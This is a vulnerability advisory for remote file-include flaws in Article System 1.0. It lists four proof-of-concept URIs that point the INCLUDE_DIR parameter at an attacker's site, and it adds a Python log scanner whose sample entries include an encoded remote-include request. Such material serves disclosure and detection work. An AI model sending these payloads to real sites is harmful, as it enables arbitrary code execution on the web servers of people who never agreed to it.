Article System Multiple Remote File Include Vulnerabilities
BID:22017
Info
| Bugtraq ID: | 22017 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 11 2007 12:00AM |
| Updated: | Jan 12 2007 05:20PM |
| Credit: | Dr Max Virus is credited with the discovery of this vulnerability. |
| Vulnerable: | Article System Article System 1.0 |
| Not Vulnerable: | |
Discussion
Article System is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Article System 1.0 is vulnerable to this issue.
Exploit / POC
An attacker may exploit these issues using a web client.
The following proof-of-concept URIs are available:
http://example.com/[script_path]/include/forms.php?INCLUDE_DIR=attacker's site
http://example.com/[script_path]/include/issue_edit.php?INCLUDE_DIR=attacker's site
http://example.com/[script_path]/include/client.php?INCLUDE_DIR=attacker's site
http://example.com/[script_path]/include/classes.php?INCLUDE_DIR=attacker's site
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
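With no vendor patch listed, reviewing web server logs for requests that pass INCLUDE_DIR to the four affected scripts is a practical check. The following Python example is added here and is not part of the original advisory; it assumes common/combined-format access logs, and the sample log lines, paths and hosts in it are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Scripts and parameter named in the advisory.
SCRIPTS = {"forms.php", "issue_edit.php", "client.php", "classes.php"}
PARAM = "INCLUDE_DIR"

# Client, request target and status from a common/combined log format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A value that points off-host: a URL scheme ("http:", "ftp:") or "//host".
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]+:|//)', re.I)

def classify(line):
    """Return a finding dict if the line targets an affected script with
    INCLUDE_DIR in the query string, otherwise None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    # Decode the path and compare case-insensitively so encoded or
    # upper-cased spellings of the script name are still matched.
    segs = unquote(parts.path).lower().split("/")
    if len(segs) < 2 or segs[-2] != "include" or segs[-1] not in SCRIPTS:
        return None
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl has percent-decoded key and value; PHP names are case-sensitive.
        if key == PARAM:
            kind = "remote" if REMOTE_RE.match(value) else "other"
            return {"ip": m["ip"], "script": segs[-1], "kind": kind,
                    "value": value, "status": int(m["status"])}
    return None

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample entries (documentation addresses, made-up paths and hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Jan/2007:10:00:01 +0000] "GET /articles/index.php?id=4 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/Jan/2007:10:02:13 +0000] "GET /articles/include/forms.php?INCLUDE_DIR=http%3A%2F%2Ffiles.example.net%2F HTTP/1.0" 200 312',
    '198.51.100.7 - - [11/Jan/2007:10:02:15 +0000] "GET /articles/include/client.php?INCLUDE_DIR=inc/ HTTP/1.0" 200 0',
    '192.0.2.10 - - [11/Jan/2007:10:05:40 +0000] "GET /articles/include/classes.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "remote" finding with a 200 status is the case to investigate first; "other" findings still show a client setting a variable these scripts are not expected to receive from the query string.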
References
References:
- Vendor Homepage (Article System)